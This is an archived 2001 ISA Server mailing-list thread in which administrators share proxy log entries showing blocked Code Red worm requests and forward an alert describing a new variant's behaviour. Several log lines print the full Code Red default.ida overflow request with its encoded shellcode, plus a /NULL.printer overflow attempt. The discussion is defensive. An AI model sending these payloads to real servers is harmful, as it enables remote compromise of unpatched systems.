RE: FW: Alert: New version of Code Red, XXXX

Wow, don't know what happened to those last 2 emails.

After a few days of portscans (all successfully blocked) I finally
started getting Code Red attacks. Some interesting info on the attacks.
A few of the source IP's have been pretty thorough about hitting every
possible combination in the ObjectName field. Regardless of their
configuration all attempts have been blocked.

From a few of the log entries -  Intitial portion of ObjectName field
************************************************************************
***
http://www.worm.com/default.ida     
http://207.225.151.2/default.ida        ISA external ip address
http://207.225.151.1/default.ida        ISA external ip address
http://TANIS/default.ida                   an internal web server name
(not sure how that was gotten. Although, I was in the process of setting
up an new site and ip's (ISAs and the web servers) around the time some
of the requests hit). ????


This is the log entry of a standard Code Red
***************************************************

207.91.144.219, anonymous, -, N, 8/5/2001, 9:46:00, W3ReverseProxy,
PALIN, -, www.worm.com, -, 0, 3966, 4039, 0, -, TCP, GET,
http://www.worm.com/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u
6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u
8b00%u531b%u53ff%u0078%u0000%u00=a, -, -, 12202, 0x0, Default rule, -


Check out the end of the ObjectName field in this one (/NULL.printer).
Not a standard Code Red but looks like they attempt a buffer overrun.
************************************************************************
***

216.29.225.188, anonymous, -, N, 8/5/2001, 10:23:34, W3ReverseProxy,
PALIN, -,
ÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂ
ÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂ
ÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂ
ÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂ
ÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂ3ÃÂÂÃââ@`3ÃÂ$ÃÃÃÃÂÂÂ1Åj,
 -,
0, 80, 1182, 0, -, TCP, GET,
http://ÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂ;
ÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂ
ÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂ
ÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂ
ÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂ3ÃÂÂÃââ@`3ÃÂ$ÃÃÃÃÂÂÂ
1Åj/NULL.printer, -, -, 12202, 0x0, Default rule, -



Michael

"Never attribute to malice that which can be adequately explained by
stupidity." Hanlon's Razor 

-----Original Message-----
From: Tim Buenz [mailto:tbuenz@xxxxxxxxxxxxxxxxxxxxxxxxxxxx] 
Sent: Sunday, August 05, 2001 11:25 AM
To: [ISAserver.org Discussion List]
Subject: [isalist] RE: FW: Alert: New version of Code Red, XXXX


http://www.ISAserver.org


Hi,

Have been lurking and watch the "new code red worm" comments on the
list. Checked my proxy log just now to find this:

62.154.210.21   anonymous       -       2001-08-05      15:49:44
JSCS-3  -       www.worm.com    -       -       21031   4039    -
-       GET
http://www.worm.com/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u
6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u
8b00%u531b%u53ff%u0078%u0000%u00=a      -       12202

In reading Jim's post below ISA must have blocked the attempt- :>)
-- 
Tim Buenz
Director of Technology 
Jefferson-Scranton Comm. Schools
204 West Madison St.
Jefferson, IA 50129
(515)386-9256
http://www.jefferson-scranton.k12.ia.us

On Sunday, August 5, 2001 11:16 AM, Jim Harrison <jim@xxxxxxxxxxxx>
wrote:
>http://www.ISAserver.org
>
>
>Sho did; that's what the "12202" entry is.   ISA says "go away boy, ya
>bother me."
>
>Jim Harrison
>MCP(2K), A+, Network+, PCG
>
>----- Original Message -----
>From: "Mark Strangways" <strangconst@xxxxxxxx>
>To: "[ISAserver.org Discussion List]" <isalist@xxxxxxxxxxxxx>
>Sent: Sunday, August 05, 2001 8:41 AM
>Subject: [isalist] RE: FW: Alert: New version of Code Red, XXXX
>
>
>http://www.ISAserver.org
>
>
>Cool, got hit. I hope ISA blocked it :)
>
>----- Original Message -----
>From: "Thomas W. Shinder" <tshinder@xxxxxxxxxxxxxxxxxx>
>To: "[ISAserver.org Discussion List]" <isalist@xxxxxxxxxxxxx>
>Sent: Sunday, August 05, 2001 11:35 AM
>Subject: [isalist] RE: FW: Alert: New version of Code Red, XXXX
>
>
>http://www.ISAserver.org
>
>
>My log entry:
>
>216.227.101.189, anonymous, -, N, 8/5/2001, 0:25:02, W3ReverseProxy, 
>MIDAS, -, 216.87.141.208, -, 0, 1692, 3818, 0, -, TCP, GET, 
>http://216.87.141.208/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
>X
>XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
X
>XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
X
>XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u909
0
>%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u000
3
>%u8b00%u531b%u53ff%u0078%u0000%u00=a, -, -, 12202, 0x0, Default
>rule, -
>
>Thomas W Shinder, M.D., MCSE, MCT
>
>
>
>-----Original Message-----
>From: Shayne Lebrun [mailto:slebrun@xxxxxxxxxxx]
>Sent: Sunday, August 05, 2001 7:22 AM
>To: [ISAserver.org Discussion List]
>Subject: [isalist] RE: FW: Alert: New version of Code Red, XXXX
>
>
>http://www.ISAserver.org
>
>
>Look for default.ida?XXX for a quick count.  69 against my ISA server 
>so far.  Uses IP addresses, so as long as your web publishing is name 
>based, it'll still go splat.  If this guy had been intelligent to do 
>reverse DNS lookups, then hit the DNS name, some would wind up getting 
>through, and (presumably :-) go splat against the patch installed.  Or 
>the fact that one has removed the index server script mappings, unless 
>one is actually using script mappings. :-)
>
>As usual, Slashdot (http://slashdot.org) has information and lively 
>discussion on this very topic.
>
>-----Original Message-----
>From: Thomas W. Shinder [mailto:tshinder@xxxxxxxxxxxxxxxxxx]
>Sent: Sunday, August 05, 2001 12:10 AM
>To: [ISAserver.org Discussion List]
>Subject: [isalist] RE: FW: Alert: New version of Code Red, XXXX
>
>
>http://www.ISAserver.org
>
>
>Hi Hugo,
>
>Thanks for the heads-up. I'll look for signs of this in my Web Proxy 
>logs.
>
>Tom
>www.isaserver.org/shinder
>
>
>Thomas W Shinder, M.D., MCSE, MCT
>
>
>
>-----Original Message-----
>From: Hugo Caye [mailto:Hugo@xxxxxxxxxxxxx]
>Sent: Saturday, August 04, 2001 10:59 PM
>To: [ISAserver.org Discussion List]
>Subject: [isalist] FW: Alert: New version of Code Red, XXXX
>
>
>http://www.ISAserver.org
>
>
>
>FYI
>
>-----Original Message-----
>From: Russ [mailto:Russ.Cooper@xxxxxxxx]
>Sent: domingo, 5 de agosto de 2001 00:48
>To: NTBUGTRAQ@xxxxxxxxxxxxxxxxxxxxxx
>Subject: Alert: New version of Code Red, XXXX
>
>
>-----BEGIN PGP SIGNED MESSAGE-----
>
>Just a quick FYI, there is a new version of Code Red which appears to 
>be spreading rather rapidly.
>
>- - Appears to be a new re-write.
>
>- - Drops some sort of remote access trojan.
>
>- - Turns off System File Checker (Windows File Protection.)
>
>- - Moves CMD.EXE to the scripts directory in IIS
>
>- - Looks like the way they make the entry into code very differently 
>than before.
>
>- - If your IDS is looking for "NNNN", forget it (but then you should 
>have been shot if you used this string anyway)
>
>Cheers,
>Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor
>
>p.s. if we don't respond right away its because we're now going to go 
>and light the fireworks here at my retreat. Might as well have lots of 
>fireworks tonight!
>
>-----BEGIN PGP SIGNATURE-----
>Version: PGP Personal Privacy 6.5.2
>
>iQCVAwUBO2zCARBh2Kw/l7p5AQH95wQAqjGp7vRYK8SYky/ydyU1wxBmCe2c8Mpd
>DBdxrv+TY9112ZuH663ZspUOXThS9oeEyT4sdbVYNv8Z28nMipbioyTXYa5dw8po
>21tkilo6ZoGX+AmKJ6Kz7WDvMpHpEfzDr3JHGtxuev0/rclXeRSN4urypMR3YnRz
>uw5ZW/F3U/I=
>=OhCV
>-----END PGP SIGNATURE-----
>
>
>
>
>------------------------------------------------------
>You are currently subscribed to this ISAserver.org Discussion List as: 
>tshinder@xxxxxxxxxxxxxxxxxx To unsubscribe send a blank email to
>leave-isalist-244621U@xxxxxxxxxxxxx
>
>------------------------------------------------------
>You are currently subscribed to this ISAserver.org Discussion List as: 
>slebrun@xxxxxxxxxxx To unsubscribe send a blank email to
>leave-isalist-244621U@xxxxxxxxxxxxx
>
>------------------------------------------------------
>You are currently subscribed to this ISAserver.org Discussion List as: 
>tshinder@xxxxxxxxxxxxxxxxxx To unsubscribe send a blank email to
>leave-isalist-244621U@xxxxxxxxxxxxx
>
>------------------------------------------------------
>You are currently subscribed to this ISAserver.org Discussion List as: 
>strangconst@xxxxxxxx To unsubscribe send a blank email to
>leave-isalist-244621U@xxxxxxxxxxxxx
>
>
>
>------------------------------------------------------
>You are currently subscribed to this ISAserver.org Discussion List as: 
>jim@xxxxxxxxxxxx To unsubscribe send a blank email to
>leave-isalist-244621U@xxxxxxxxxxxxx
>
>
>
>------------------------------------------------------
>You are currently subscribed to this ISAserver.org Discussion List as: 
>tbuenz@xxxxxxxxxxxxxxxxxxxxxxxxxxxx
>To unsubscribe send a blank email to 
>leave-isalist-244621U@xxxxxxxxxxxxx
>



------------------------------------------------------
You are currently subscribed to this ISAserver.org Discussion List as:
skyjumpr@xxxxxxxxxxx To unsubscribe send a blank email to
leave-isalist-244621U@xxxxxxxxxxxxx

Other related posts: